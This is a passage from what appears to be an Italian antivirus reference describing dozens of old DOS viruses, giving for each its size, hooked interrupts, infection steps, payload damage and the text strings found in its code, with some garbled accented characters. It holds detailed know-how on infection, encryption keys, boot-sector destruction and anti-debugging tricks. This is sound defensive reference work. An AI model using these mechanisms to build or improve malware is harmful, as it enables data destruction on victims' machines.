"SI", il virus lo infetta. 3) Inserisce 4096 Byte nell'area della memoria alta, trasferisce inoltre 3589 Byte del suo codice a HMA. 4) Intercetta l'INT 21. 5) La routine originale riprende il controllo. Danni: Se la data di sistema Φ il giorno 1 novembre o 15 marzo, il virus formatta l'hard disk sovrascrivendo i primi 4 settori di ogni traccia con informazioni parassite. Questo distrugge il settore di boot e la tabella di allocazione dei file. Questo elimina la partizione DOS dell'hard disk . Il virus formatta inoltre il floppy disk (se presente). Il virus mostra delle informazioni inutili e cambia la colorazione dello schermo con una scelta a caso. Nel codice del virus si pu≥ trovare il seguente messaggio: "AMOEBA virus by the Hacker Twins (c) 1991" "This is nothing, wait for the release of" "AMOEBA II-the universal infector hidden to" "any eye but ours!" "Dedicated to the University of Malta-the worst" "educational system in the universe and destroyer" "of 5x2 years of human life" Questo messaggio appare sullo schermo dopo che il virus Φ stato trasferito sull'hard disk: "To see a world in a grain of sand, And a heaven in a wild flower Hold Infinity in the palm of your hand And Eternity in an hour." THE VIRUS 16/3/91 [Vampiro.A] Tipo di Virus: Virus da file Lunghezza del Virus: Tipo di memoria: Memoria alta Vettore PC agganciato: INT 21h Metodo di infezione: 1) Acquisisce l'ora e la data di sistema. Viene eseguito il codice del virus se il mese corrente Φ precedente a giugno oppure l'ora Φ precedente alle 22. Il virus infetta i file con estensione *.COM non nella directory principale. Apre e cerca subdirectory dove cerca file con estensione *.COM da infettare. Si attacca al programma ospite. Danni: Infetta i file nella subdirectory. Se la data e l'ora non vengono soddisfatte, compare: "Zarathustra & Drako les comunican que llego la hora de ir a dormir. Shh! Vampiro Virus." Note: 1) Virus non residente in memoria. 2) Non utilizza allocazione in memoria. 3) Si esegue direttamente. Sintomi: Nel codice si pu≥ trovare la seguente stringa: "Zarathustra & Drako les comunican que llego la hora de ir a dormir. Shh! Vampiro Virus." "Command.com all xray, memoria allocation error." "Cannot uninstall xray, it has not been installed." "???????????" [Mange-Tout.1099] Tipo di Virus: virus da file (File con estensione *.EXE) Lunghezza del Virus: Tipo di memoria: Residente in memoria alta Luogo d'origine: Vettore PC agganciato: INT 08h, INT 09h, INT 21h Metodo di infezione: 1) Copia il suo codice all'indirizzo 0054:0000. 2) Invia una serie di dati in ingresso ed in uscita alla porta 21h. 3) Aggancia INT 8, 9, e 21. 4) Controlla che il file sia un file con estensione *.EXE. Se "SI", il virus lo infetta trasferendo i primi 198 Byte del codice originale alla fine del file ed il suo codice all'inizio. [TP39VIR] Pseudonimo: Yank-39 Tipo di Virus: Virus da file Lunghezza del Virus: Circa 2768 Byte Tipo di memoria: Condizioni di attivazione: Si attiva se sono le ore 17.00 di un qualsiasi giorno. Suona parte della canzone: "Jack and Jill" Si esegue direttamente: Caricamento del codice del virus in memoria alta Vettore PC agganciato: Int 21 Metodo di infezione: 1) Si carica in memoria alta, allocando 2896 Byte. 2) Sposta 2768 Byte nella memoria. 3) Infetta i file con estensione *.COM e *.EXE. Copia il codice del virus nel programma ospite. Il virus si carica prima che giri il programma ospite. [Yank-D.TP.44.A] Pseudonimo: Yank-44A Tipo di Virus: Virus da file Lunghezza del Virus: Circa 2880 Byte Tipo di memoria: Condizioni d'attivazione: Si attiva se sono le ore 17.00 di un qualsiasi giorno. Suona parte della canzone: "Jack and Jill" Esecuzione diretta: Caricamento del codice del virus in memoria alta Vettore PC agganciato: Int 21 Metodo di infezione: 1) Si carica in memoria alta, allocando 3008 Byte. 2) Sposta 2880 Byte nella memoria. 3) Infetta i file con estensione *.COM e *.EXE. Copia il codice del virus nel programma ospite. Il virus si carica prima che giri il programma ospite. [Xpeh.4928] Pseudonimo: Yankxpeh Tipo di Virus: Virus da file Lunghezza del Virus: Circa 4768 Byte Luogo d'origine: Esecuzione diretta: Caricamento del codice del virus in memoria alta Vettore PC agganciato: Int 21 Metodo di infezione: 1) Si carica in memoria alta, allocando 4944 Byte. 3) Sposta 4768 Byte nella memoria. 4) Infetta i file con estensione *.COM e *.EXE. Copia il codice del virus nel programma ospite. Il virus si carica prima che giri il programma ospite. [Tanpro.5241] Nome del Virus: Tanpro Tipo di Virus: Virus da file Lunghezza del Virus: Circa 524 Byte Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21, Int 27 Metodo di infezione: Utilizza TSR, Int 27. Alloca 3104 Byte (usando MEM) della memoria. Crea un file senza nome nascosto nella directory principale della lunghezza di 10000 Byte. Nel codice Φ presente la stringa "This file is infected..." Esegue questo programma, in seguito lo cancella quindi chiama l'Int 27, per ritornare in possesso della memoria per infettare altri file. Infetta i file con estensione *.COM e *.EXE. Copia il codice del virus nel programma ospite, aggiungendo circa 524 Byte. Il virus si carica prima che giri il programma ospite. Mentre il virus Φ in memoria, infetta ogni file con estensione *.COM ed *.EXE eseguito. Non fa niente di speciale. Si replica solo quando Φ in memoria. Infetta il file solo se viene eseguito. Danni: 1) La memoria libera diminuisce di circa 3104 Byte. 2) Aumenta la lunghezza dei file di circa 524 Byte. Sintomi: 1) Cancellazione del programma in esecuzione a causa dell'attivitα del virus. 2) Appare nel codice del virus la stringa: "(c) tanpro'94". Metodo di rilevazione: Individuazione della suddetta stringa di testo. [Manzon] Tipo di Virus: Virus da file, Soft Mice Lunghezza del Virus: 1712 Byte Virus Infect Type: File con estensione *.COM Tipo di memoria: Residente in memoria alta Vettore PC agganciato: INT 21h Metodo di infezione: 1) Decripta 1417 Byte del suo codice e quindi alloca 1728 Byte in HMA. 2) Trasferisce il suo codice a HMA della lunghezza di 1712 Byte. 3) Intercetta l'INT 21. 4) Riprende il controllo della routine originale. Il codice del virus ha una stringa di programmi ed utilitα per DOS che il virus scambia con il file infettato. Questo metodo rende pi∙ difficile la cancellazione. [Kaos4.A] Tipo di Virus: Virus da file Lunghezza del Virus: Luogo d'origine: Tipo di memoria: Non Residente Vettore PC agganciato : Metodo di infezione: 1) Imposta l'area di trasferimento dati del disco, 114C:0816h. 2) Cerca di infettare i file con estensione *.COM e *.EXE nella stessa directory ed altre directory specificate nel percorso. Utilizza la "Find First Match Directory Entry", dove infetta tutti i file con estensione *.COM e *.EXE. 3) Imposta ancora DTA, 114C:0080h. 4) Compare il messaggio depositato nel codice del virus. [Sarampo.B] Tipo di Virus: Virus da file (File con estensione *.COM e *.EXE) Lunghezza 1371 Byte Sintomi : La lunghezza dei file con estensione *.COM ed *.EXE aumenta di 1371 Byte e diminuisce quella della memoria disponibile di 1664 Byte. L'esecuzione dei programmi pu≥ rallentare a causa della procedura di infezione del virus. Note: Durante la prima infezione, il virus alloca 1664 Byte nella memoria e trasferisce il suo codice in HMA. Aggancia l'INT 21 e l'INT 24. Ripristina quindi il programma mentre Φ in memoria in modo da tornare in possesso del controllo della routine originale. Questo virus infetta tutti i file con estensione *.COM e *.EXE aperti, eseguiti e copiati. Cambia anche l'ora del file in 13:13. SARAMPO mostra sullo schermo delle informazioni parassite se la data di sistema Φ il giorno 25 aprile, 25 dicembre o 12 ottobre, ed il virus Φ giα in memoria da circa 2 minuti. Nel codice del virus Φ presente il seguente testo: "Do you like this Screen Saver ? I hope so." "Created by Sarampo virus" [Hare.7610] Tipo di Virus: Virus da file Lunghezza del Virus: Virus Infect Type: File con estensione *.COM e *.EXE ed il Master Boot Record Tipo di memoria: Memoria alta Vettore PC agganciato: Int 21h Metodo di infezione: 1) Annota i dati in CS:[DI] o 115C:2822 con un valore di CX di ED5h. quindi parte un'altra codificazione a 115C:29B2 con un valore di CX di E0Eh, 2) Fa un XOR con un valore esadecimale di 2726 3) Aumenta AH e AL di 2h. 4) Acquisisce la grandezza della memoria con un valore del registro di ritorno AX=280h. 5) Acquisisce la variabili del DOS e si carica nella memoria alta partendo da 115C:2810 fino a 9DDE:0 con una misura di 1DBAh. Vi si pu≥ trovare il messaggio: "HDEuthanasia by Demon Emperor: Hare Krsua, hare, hare" 6) Intercetta l'Int 21h e lo imposta. Da qui infetta il master boot record. [Hare.7750] Tipo di Virus: Virus da file, file con estensione *.COM e *:EXE ed il Master Boot Record Tipo di memoria: Memoria alta Vettore PC agganciato: Int 21h Metodo di infezione: 1) Cripta i dati posti in posizione 115C:[2824], 3866 volte, usando l'operando NOT. Esegue poi un altro loop alla posizione 115C:[29B2], per 3667 volte, eseguendo un XOR con AX. AH ed AL sono incrementate di 2h, questo determina: "INFECTUM.COM.HOSTA.COMCOM.COMMAND\SYSTEM\IOSUBSYS\HSFLOP.PDR" 2) Acquisisce la lunghezza della memoria, 640 Byte. 3) Acquisisce la variabili del DOS 4) Carica il codice in memoria alta, da 115C:2810 a 9DD5:0000 (7750 Byte). 5) Ritorna ai parametri del disco per leggere l'hard disk. Legge i settori del disco, 1 settore deve essere trasferito all'indirizzo 9DD5:2096, traccia n.108, settore n.1, testina n.125. 6) Esegue i seguenti codici: XOR AL,AL OUT 43,AL JMP 94C IN AL,40 MOV AH,AL IN AL,40 XOR AL,AH XCHG AL,AH Il virus infetta prima il MBR, da qui aspetta un file con estensione *.COM e *.EXE. Danni: Quando si riavvia, il computer si riavvia ripetutamente. [Markt] Tipo di Virus: Virus da file, Soft Mice Pseudonimo: WERBE Lunghezza del Virus: 1533 Byte Nome originale: WERBE Luogo d'origine: Germania Vettore PC agganciato: Metodo di infezione: 1) Decripta 1412 Byte del suo codice virale. 2) Acquisisce l'indirizzo DTA e lo imposta. 3) Controlla il drive corrente e quindi sovrascrive il settore di boot dell'hard disk. Danni: Al suo caricamento il virus sovrascrive tutti i settori di boot di tutti i drive, in questo modo li rende inutilizzabili. Nel codice del virus si pu≥ trovare il seguente messaggio: "Ups, all Disks from" "C: to Z: Trashed!" "Sorry about that!" "to all Military Inventors its time to give us the Tachyonator!" "MediaMarkt WerbeVirus '94 (c)" "MediaMarkt Germany The Wizard" Note: Dopo aver distrutto l'hard disk il virus esegue il seguente codice: 17AC:0575 JMP 0575 Questo codice esegue una sequenza di istruzioni interminabile. [Leon.1217] Tipo di Virus: Polimorfico, Virus da file (File con estensione *.EXE) Lunghezza del Virus: 1,224-1,253 Byte Tipo di memoria: Non residente in memoria Luogo d'origine: Vettore PC agganciato: INT 24h Metodo di infezione: Il virus infetta solo i file con estensione *.EXE. Aumenta la lunghezza del file infetto di 1,224-1,253 Byte. Il virus infetta il file ospite attaccandosi alla fine del file. Come virus polimorfico, decripta prima i suoi programmi facendo un XOR con un valore esadecimale di 1410H per ogni parola criptata. Quindi intercetta l'INT 24H per mettere fuori uso la visualizzazione di un errore di scrittura del disco mentre infetta il file ospite. Controlla quindi la directory corrente del disco in uso e cerca file con estensione *.EXE. Dopo aver trovato un file cambia i suoi attributi per archiviarlo. Controlla poi l'ora corrente. Se ci si trova tra i 7 e i 60 minuti di un'ora e tra i 30-60 secondi di un minuto, il virus chiude il file e non lo infetta. Oltre a questo, il virus infetta ogni file con estensione *.EXE in tutte le subdirectory del drive corrente. Non risiede in memoria. Si attiva solo al caricamento ed esecuzione di un file infetto. Risulta ovvio che il virus per infettare i .file con estensione *.EXE nel drive corrente impiega un certo tempo a caricare un file a seconda del numero di file con estensione *.EXE presenti nel drive corrente. Danni: Rallenta il caricamento di un file eseguibile. Sintomi: 1) I file infetti incrementano le loro dimensioni di 1,224-1,253 Byte. 2) Caricamento molto lento dei file eseguibili. [Karnavali.1972] Tipo di Virus: Virus da file Pseudonimo: Lunghezza del Virus: Luogo d'origine: Vettore PC agganciato: Metodo di infezione: 1) Acquisisce le variabili del DOS 2) Legge il drive C: legge i settori FFFFh, partendo dal settore 5945h e la memoria all'indirizzo 139E:0889h per il trasferimento dei dati. 3) Cerca di scrivere 4 settori in drive C:. Dopo aver scritto, i file con estensione *.EXE *.COM eseguiti non si infettano. Dopo aver riavviato il sistema, il sistema si blocca e la tastiera viene disabilitata. [Tecla] Nome del Virus: BARR1303 Tipo di Virus: Polimorfico, Virus da file (File con estensione *.COM ed *.EXE) Pseudonimo: TECLA Lunghezza del Virus: 2051 Byte Condizioni d'attivazione: 23 settembre Tipo di reinfezione: No Tipo di memoria: Residente in memoria alta Luogo d'origine: Vettore PC agganciato: INT 16h, INT 21h, INT 24h Metodo di infezione: Questo virus Φ di tipo polimorfico ed infetta i file con estensione *.EXE e *.COM. Aggiunge 1303 Byte ad un file infetto. Prima decripta il suo codice, che si attacca all'ospite, utilizzando SUB 75H ad ogni byte. Pu≥ essere individuato per via della stringa "SSta Tecla(MAD1) dell'area decriptata del codice virale che da un altro nome al virus. Copia il suo programma (1033 Byte) in memoria alta, 9F9A:0100; cos∞ sovrascrive la memoria della scheda video Una volta in memoria, controlla che la data di sistema sia il giorno 23 settembre. Se "SI", attiva la sua procedura, intercettando l'INT 16H (change to vector 9F9A:017C) e cambia la tabella ASCII della tastiera. Incrementa tutti gli input della tastiera di 1 carattere ASCII. Per esmpio premendo "A" viene mostrato "B", o digitando "." viene mostrato "/", e cos∞ via. Senza la data di attivazione intercetta l' INT 21h cambiando i valori del proprio preogramma nella memoria alta con 9F9A:016C per infettare ogni programma eseguito. Intercetta inoltre l'INT 24h e cambia il suo vettore a 9F9A:0107 che si Φ visto non avere nessuna procedura. Danni: Cambia i caratteri immessi con la tastiera, incrementando di 1 i caratteri ASCII. [Barrotes.1310.A] Nome del Virus: BARR1310 Tipo di Virus: Virus da file Pseudonimo: Lunghezza del Virus: 1310 Byte Virus Infect Type: File con estensione *.COM ed *.EXE Condizioni d'attivazione: 5 Gennaio Tipo di reinfezione: No Tipo di memoria: Residente in memoria alta Luogo d'origine: Vettore PC agganciato: INT 1Ch, INT 21h Metodo di infezione: E un virus da file che infetta i file con estensione *.COM ed *.EXE. Aggiunge 1303 Byte ad un file infetto. Copia il suo programma in memoria alta in 9F9C:0100; in questo modo si sovrappone alla memoria della scheda video. Intercetta l'INT 21H cambiando i propri vettori per individuare il proprio programma a 9F9C:017B. Questo permette al virus di infettare quando carica ed esegue dei file. Una volta in memoria, controlla la data. Se Φ il giorno 5 gennaio, cambia l'INT 1CH per mettere il proprio programma in memoria alta in 9F9C:049F. Quindi sovrascrive il MBR di drive C; distrugge cos∞ la sua partizione. Da quando l'INT 1CH Φ un interrupt di clock tick, il programma Φ impostato per la sua esecuzione 18.2 volte al secondo. A questo interrupt il programma mostra: "Virus BARROTES pro OSoft" su uno sfondo blu, e quattro verticali, tremolanti barre sullo schermo. A questo punto, la macchina pu≥ ancora essere usata se l'utente pu≥ tollerare la vista delle barre. Danni: 1) Distrugge la MBR del drive C e la tabella di partizione. 2) Altera la visualizzazione del video. [Cascade] Nome del Virus: CAS1701A Tipo di Virus: Polimorfico, Virus da file Pseudonimo: Variant: CASCADE.1704 Lunghezza del Virus: 1,701 Byte Virus Infect Type: File con estensione *.COM Virus Reinfettante: no Tipo di memoria infettata: Residente in memoria (MCB) Luogo d'origine: Vettore PC agganciato: INT 21h Metodo di infezione: Il virus infetta solo i file con estensione *.COM. Aumenta la lunghezza di un file infetto di 1,701 Byte. Il virus infetta il file ospite attaccandosi alla fine del file. Risiede in memoria e pu≥ essere attivato al caricamento e all'esecuzione di un file con estensione *.COM infetto. Come virus polimorfico, decripta prima il suo codice. Quindi il virus copia il suo programma di 1701 Byte in memoria bassa, dopo i programmi DOS. Intercetta poi l'INT 21H cambiando il proprio vettore per puntare il proprio programma a 17F8:031C. Utilizza l'INT 4BH per a ttaccarsi al file ospite. Dopo essersi attaccato all'ospite, cripta il suo programma principale e scrive il nuovo file sul disco. Il virus controlla l'anno corrente prima di infettare il file ospite e l'anno d'attivazione Φ il 1988. Il virus occupa 1,984 Byte di memoria quando individuato usando DOS CHKDSK. Sintomi: 1) I file infetti incrementano le loro dimensioni di 1,701 Byte. 2) La memoria diminuisce di 1,984 Byte. [Natas-1] Pseudonimo: Never-1 Origin: Lunghezza del virus: 1788 Byte Tipo di Virus: Virus da file; Virus criptato; solo i file con estensione *.COM Sintomi : I file infetti incrementano le loro dimensioni di 4744 Byte, la memoria disponibile diminuisce di 6144 Byte. L'esecuzione di un programma rallenta. Note: Innanzitutto il virus decripta 2300 Byte del suo codice e quindi alloca 6144 Byte nell'area di memoria alta. Sposta poi 5111 Byte nell'area di memoria alta. Intercetta l'INT 10, 13, 15 e 21. Ulteriori analisi del virus non sono possibili perchΘ ha sostituito il codice dell' INT 1 che Φ il Single Step Interrupt che Φ usato per ricercare e correggere errori da DEBUG e da S-ICE. NATA4744 formatta una traccia nell'hard disk ogni volta che l'INT 1 viene usato, e continua a fare cos∞ finchΦ tutti i drive locali non sono stati formattati. Nel codice del virus si trova il seguente messaggio: "Time has come to pay (c) 1994 NEVER-1" [S_Bug.A] Tipo di Virus: Polimorfico Virus Lunghezza del virus: 3500-5500 Byte Virus Status: Sintomi : Aumento della lunghezza dei file con estensione *.COM e *.EXE infetti di 3500-5500 Byte e diminuzione della memoria disponibile di 10272 Byte. I programmi eseguiti possono rallentare a causa della procedura di infezione del virus. Note: Questo virus Φ molto complesso ed altamente Polimorfico. Dapprima decripta 3504 Byte del propΦrio codice virale e poi assegna 10 kByte di memoria. E' cos∞ residente in memoria. Iniziata l'infezione intercetta l'INT 21h con i servizi 3D, 4B e 6C. I file infettati dal virus Φ facile che abbiano la lunghezza assegnata casualmente dai codici di decifrazione del codice virale che Φ di 3504 Byte. La lunghezza dei file va dai 3500 Byte ai 5500 Byte. Tutti i file con estensione *.COM ed *.EXE che sono aperti, eseguiti o copiati saranno infettati se Φ soddisfatta la seguente condizione: COMSPEC=COMMAND.COM. Questa condizione Φ anche quella che attiva il virus in caso sia residente o meno. Questo messaggio Φ trovato nel codice virale: "Satan Bug Virus - Little Loc" [Smeg.Pathogen] Pseudonimo: SMEG v0.1 Origine : Regno Unito Lunghezza del virus : 4432-4447 Byte Tipo di Virus: Sintomi : Aumenta la misura dei programmi con estensione *.EXE e *.COM di 4432-4447 Byte e diminuisce di 7872 la memoria disponibile. Commenti generali: Nella prima infezione, stanzia 7872 Byte nella memoria alta e trasferisce 3700 Byte del propΦrio codice in questa area. Intercetta poi l'INT 21, l'INT 13, l'INT 20 e trasforma l'INT 3 come INT 21. Pathogen Φ molto complesso ed Φ un virus Polimorfico. Questo virus infetta i file con estensione *.COM ed i file con estensione *.EXE che vengono aperti, eseguiti e copiati. Mostra inoltre un "errore di allocazione della memoria" quando un file cerca di essere residente in memoria. Pathogen ha una procedura pericolosa, perchΘ quando la data di sistema Φ luned∞ e sono le 17:00 - 17:59 PM scrive degli zero su un settore dell'hard disk scelto a caso, in questo modo distrugge alcuni se non tutti i dati del disco. Inoltre rovina o azzera il BIOS del computer. Il virus mostra i seguenti messaggi sullo schermo: "Your hard-disk is being corrupted, courtesy of PATHOGEN!" "Programmed in the U.K. (Si, NOT Bulgaria) (c) The Black Baron 1993-4" "Featuring SMEG v0.1 : Simulated Metamorphic Encryption Generator" " 'Smoke me a kipper, I'll be back for breakfast.....!" "Unfortunately some of your data won`t!!!!!" [Cawber] Tipo di Virus: Polimorfico Lunghezza del Virus: 2010 Byte Tipo di memoria: Non residente in memoria Luogo d'origine: Vettore PC agganciato: Metodo di infezione: E' un tipo di virus polimorfico che prima decripta il proprio decifratore usando 63 Byte di dati nel proprio codice virale. Ogni byte, archiviato nel registro AX, Φ decifrato usando SHL AX,1 ed Φ aggiunto al regisro BP. Il risultato finale dell'archiviazione in BP, dopo 63 decifrazioni, sarα il decifratore. A questo puntodecifra 2,010 Byte del proprio facendo un XOR con il valore del registro AX, BP, dove AX contiene una parola del codice virale. Non Φ stato visto come come faccia a trasferirsi residente in memoria ed a intercettare gli interrupt. Non ci sono altri modi per attivare l'infezione. [Sayha] Tipo di Virus: Virus da file Lunghezza del Virus: Tipo di reinfezione: Non reinfetta Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21h Metodo di infezione: 1) Si carica nella memoria alta, caricandi circa 9040 Byte. 2) Infetta i file con estensione *.COM ed *.EXE *. ensione *. Attaccandosi al programma ospite 3) Sposta il codice del virus by batches, copiando due byte del proprio codice alla volta in diversi posti. Danni: 1) Aumenta la misura dei file. 2) Occupa spazio nella HMA. Sintomi: Ritarda l'esecuzione dei programma. [SCITZO] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 1329 Byte Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 21h Metodo di infezione: 1) Si carica nella memoria alta, stanziando 1360 Byte (usando MEM). 2) Sposta 1329 (0531H) Byte nella memoria alta. 3) Infetta i file con estensione *.COM ed *.EXE. Copia il codice del virus nel programma ospite, aggiungendo circa 1329 Byte. Carica il virus prima di eseguire il programma ospite. Il virus quando Φ in memoria, infetta ogni file con estensione *.COM ed *.EXE che viene eseguito. Non fa niente di speciale. Si limita a replicarsi quando Φ residente in memoria. Infetta solo i file eseguibili. Danni: 1) Diminuisce la memoria libera. 2) I file infetti aumentano di lunghezza. 3) Aggiunge circa 1329 Byte. Sintomi: A causa dell'attivitα del virus, viene rallentata l'esecuzione dei programmi. Metodo di rilevazione: Cercare la stringa del virus. [Necros] Luogo d'origine: Tralee, Co. Kerry, Ireland Lunghezza del virus: 1164 Byte Tipo di Virus: Virus da file; Virus Criptato; infetta i file con estensione *.COM. Sintomi : Aumenta la lunghezza dei file con estensione *.COM di 1164 Byte, diminuisce la memoria disponibile di 2624 Byte. L'esecuzione dei programmi viene rallentata. Appare un messaggio d'errore protetto da scrittura quando un programma viene aperto ed il disco Φ protetto da scrittura. Note: Dapprima questo virus decifra il proprio codice di 1142 Byte e poi intercetta l'INT 3, l'INT 21 e l'INT 1C. Quindi colloca 2624 Byte in memoria. Questo virus virus diventa residente in MCB dopo l'esecuzione del programma perchΘ esegue un comando TSR. Infetta immediatamente i file con estensione *.COM che vengono eseguiti. Quando sono in esecuzione i file con estensione *.EXE , Necros crea un file nascosto con estensione *.COM con lo stesso nome portando la lunghezza del file a 1164 Byte. Il virus Necros controlla che la data di sistema sia il 21 Novembre. Se Φ soddisfatta questa condizione, parte un suono di conto alla rovescia 2 minuti dopo che il virus Φ stato caricato. Questo va avanti per 15 secondi prima che appaia questo messaggio sullo schermo: "Virus V2.0 (c) 1991 Necros the Hacker." "Written on 29,30 June in Tralee, Co. Kerry, Ireland" "Happy Birthday, Necros!" [Helloween.1376] Tipo di Virus: Virus da file, infetta i file con estensione *.EXE e *.COM. Pseudonimo: Lunghezza del Virus: Condizioni d'attivazione: 1 Novembre. Tipo di memoria: Memoria alta . Vettore PC agganciato: Int 21h. Metodo di infezione: 1) Si carica nella memoria alta copiando immediatamente dall'indirizzo 1155:0129h a 9F89:0000h, 1376 Byte. 2) Intercetta l'INT 21h. 3) Acquisisce data ed ora di sistema, ed i valori di ritorno sono messi in BCD. 4) Controlla che sia il primo Novembre. Se "SI", pulisce lo schermo, diventa rosso il colore dello sfondo, ed appare questo messaggio in mezzo allo schermo: "Nesedte porad u pocitace a zkuste jednou delat neco rozumneho!" "**************" "!! Poslouchjte HELLOWEEN - nejlepsi metalovou skupinu !!" Premendo un qualsiasi pulsante, la macchina viene riavviata. Non infetta. Ma se la data non Φ il primo Novembre, il file con estensione *.COM e/o *.EXE che sono stati eseguiti vengono infettati. Metodo di rilevazione : I file infetti diventano di 1376 Byte. [Delta.1163] Tipo di Virus: Polimorfico, virus da file, infetta i file con estensione *.EXE e *.COM. Pseudonimo: Lunghezza del Virus: 1163 Byte Nome originale: DELTA Tipo di infezione: Condizioni d'attivazione: 4 Novembere Tipo di reinfezione: no Data di rilevazione.: Febbraio 1996 Tipo di memoria: Memoria alta Luogo d'origine: Brasile Vettore PC agganciato: INT 21H Metodo di infezione: Come virus polimorfico dapprima decripta il proprio programma principale facendo uno XOR con il valore di C0H a ciascun byte. Infetta il proprio ospite attaccandosi alla fine del file. Aggiunge 1,163 al file infettato. Quindi copia il proprio programma nella memoria alta in 9F69:0000 e vi salta dentro.Intercetta l' INT 21H impostando il proprio vettore su 9F69:01C5. Il virus pu≥ diventare residente in memoria caricando od eseguendo un file infetto. Essendo residente in memoria si pu≥ aggiungere ad un file eseguibile utilizza il servizio 4BH dell' INT 21H intercettato. Durante l'infezione il virus controlla che sia Novembere e che il giorno sia il 4. A questo punto il virus azzera la configurazione del C:\ BIOS e cambia la sequenza di avvio per cercare il drive C:\ al primo avvio. Quindi aspetta 30 sec. Prima di fare un warm boot. Appaiono i seguenti messaggi: "Good Byte from (DEL)ta Virus!!!" " Reset in 30 seconds. " Dopodiche, l'hard disk viene disabilitato, come se avesse la tabella delle partizioni alterata. Infettando un file eseguibile compie la sua seconda infezione al COMMAND.COM nel drive A:\; in questo modo altera e disabilita il settore d'avvio. Gli effetti della procedura possono essere risolti semplicemente riconfigurando l'hard disk nel BIOS e sostituendo il COMMAND.COM infetto con uno nuovo fin quando il virus non srive in MBR. Altre stringhe possono essere viste nel codice del virus a fianco di quello mostrato sopra: "Brazil - 02/96" Danni: 1) Azzera la configurazione del BIOS dell'hard disk. 2) Altera COMMAND.COM. Sintomi: I file infetti incrementano le loro dimensioni di 1163 Byte. [Delwin.1759] Tipo di Virus: polimorfico, Boot/Virus da file Lunghezza del Virus: 2048 Byte Virus Infect Type: .COM and .File con estensione *.EXEs Tipo di reinfezione: no Data di rilevazione.: Tipo di memoria: High memoria resident Luogo d'origine: Vettore PC agganciato: INT 13h, INT 21h, INT 1Ch Metodo di infezione: Infezione del Master Boot Sector: Il virus dapprima infetta il Master Boot Sector del drive C:\. Come virus polimorfico per prima cosa decripta 1,714 Byte del propΦrio codice facendo un XORcon il valore di 9B. Quindi legge il settore di boot del drive C:\. Salva una copia di questo settore sulla testina 0, cilindro 0, settore 2 del drive C:\. Quindi invia per due volte un byte alla porta 70H per un motivo sconosciuto in quanto la porta dell' hardware non Φ disponibile. Il virus fa una copia del proprio programma, occupando 4 settori, in testina 0, cilindro 0, settore 3 del drive C:\. Quindi il virus modifica i primi 46 Byte del settore di boot copiando il suo programma e lo scrive ancora nel settore di boot del drive C:\. Infezione di file eseguibili: Una volta che il virus ha infettato il settore di boot sector del drive C:\ diventa residente in memoria sopra i dati del settore di boot. Avviando il sistema dapprima inserisce spazio nella memoria alta cominciando da 9E70:0000. Quindi legge il suo programma, che occuoa 4 settori, del drive C:\ infetto cominciando dal settore 3, cilindro 0, testina 0, per inserire spazio nella memoria alta (9E70:0100). Da qui intercetta l'INT 13H e l'INT 21H per sistemare il proprio programma nella memoria alta affinchΦ permetta al virus di aggiungersi ad ogni file con estensione *.COM o *.EXE caricati od eseguiti. Dopo aver intercettato gli interrupt recupera l'originale settore di boot da testina 0, cilindro 0, settore 2 del drive C:\ per ripristinare un normale avvioA questo punto il virus Φ giα residente in memoria e pu≥ infettare i file eseguibili quando caricati, eseguiti e copiati. Dapprima ricerca il COMMAND.COM per infettarlo. Il virus infetta il file aggiungendosi alla fine di questo. Tuttavia, nella maggior parte dei casi ci≥ non avviene in maniera completa ed alcune volte questo altera il programma aggiungendo una quantitα di informazioni non definite. Non esistono attivazione e procedura d'avvio. Danni: Corrompe i file eseguibili. Sintomi: Rallenta il caricamento dei file e la loro esecuzione. [Lemming.2160] Tipo di Virus: Virus da file Luogo d'origine: Tipo di memoria: Non residente in memoria Vettore PC agganciato: Int 21 Metodo di infezione: 1) Cripta i dati da 114C:[SI+BP],facendo un XOR con un valore esadecimale di 49h producendo il seguente messaggio: "TBDRV SP" "The Rise and Fall of ThunderByte-1994-Australia" "You will Never Trust Anti-Virus Software Again!!" "[LEMMING] ver .99" "TBAVTBSCANNAVVSAFEFPROT" "COMcomEXEexe" 2) Acquisisce le variabili del DOS ed inserisce "[LEMMING] ver .99." Mentre il virus Φ residente in memoria, appare un errore di protezione in scrittura se l'utente cerca di eseguire un file con estensione *.EXE o *.COM da un dischetto protetto in scrittura. [Wulf.1500-1] Pseudonimo: Wulf Tipo di Virus: Virus da file Lunghezza del Virus: Circa 1500 Byte Tipo di memoria: Memoria alta Luogo d'origine: Vettore PC agganciato: Int 13h, Int 21h Metodo di infezione: 1) Dopo che Φ stato decriptato si carica in memoria, inserendo 2976 Byte (9F46:0000). 2) Sposta 1500 (05CCH + 0010H) Byte nella memoria alta. 3) Infetta i file con estensione *.EXE. Copi il codice virale nel programma ospite, aggiungendo circa 1500 Byte. Carica il virus prima di eseguire il programma ospite. 4) Mentre residente in memoria, il virus infetta tuti i file eseguiti con estensione *.EXE. Il virus reagisce normalmente facendo spazio nella memoria prima di infettare i file. Non accade nulla di straordinario. Aggiunge il proprio codice al programma ospite dopo che Φ stato caricato dalla memoria. Danni: 1) Diminuisce la memoria libera. 2) Aumenta la lunghezza dei file. Sintomi: pu≥ mostrare "TBMEMXXXTBCHKXXXTBDSKXXXTBFILXXXPSQRW" "[WULF] (c) 1995-96 Werewolf" "CLEAN.AVP.TB.V.SCAN.NAV.IBM.FINDV.GUARD.FV.CHKDSK" che appare nel codice del virus.. Metodo di rilevazione: Il codice del virus decifrato, quindi ricercare le stringhe sopra riportate. [Teraz.2717] Tipo di Virus: Virus da file Lunghezza del Virus: Circa 2717 Byte Tipo di reinfezione: Non reinfettante, la misura dei file infetti Φ consistente Tipo di memoria: Non Residente Luogo d'origine: Vettore PC agganciato: Int 21h Metodo di infezione: Infetta direttamente i file con estensione *.COM ed *.EXE quando viene eseguito un file infetto. Copia il codice virale nel programma ospite, aggiungendo circa 2717 Byte. Carica il virus prima di eseguire il programma ospite. Il virus infetta ogni file con estensione *.COM ed *.EXE che viene esguito. Non fa nulla di speciale. Si replica solamente quando Φ residente in memoria. Infetta solo i file eseguiti. Danni: 1) Aumenta la lunghezza dei file. 2) Aggiunge circa 2717 Byte. Sintomi: Ritarda l'esecuzione dei programmi. [N-Xeram] Pseudonimo: Xeram Tipo di Virus: Virus da file Lunghezza del Virus: Circa 1667-1678 Byte Tipo di reinfezione: Non reinfettante, la misura dei file infetti Φ consistente. Se il file Φ giα corrotto lo salta e cerca un altro file con 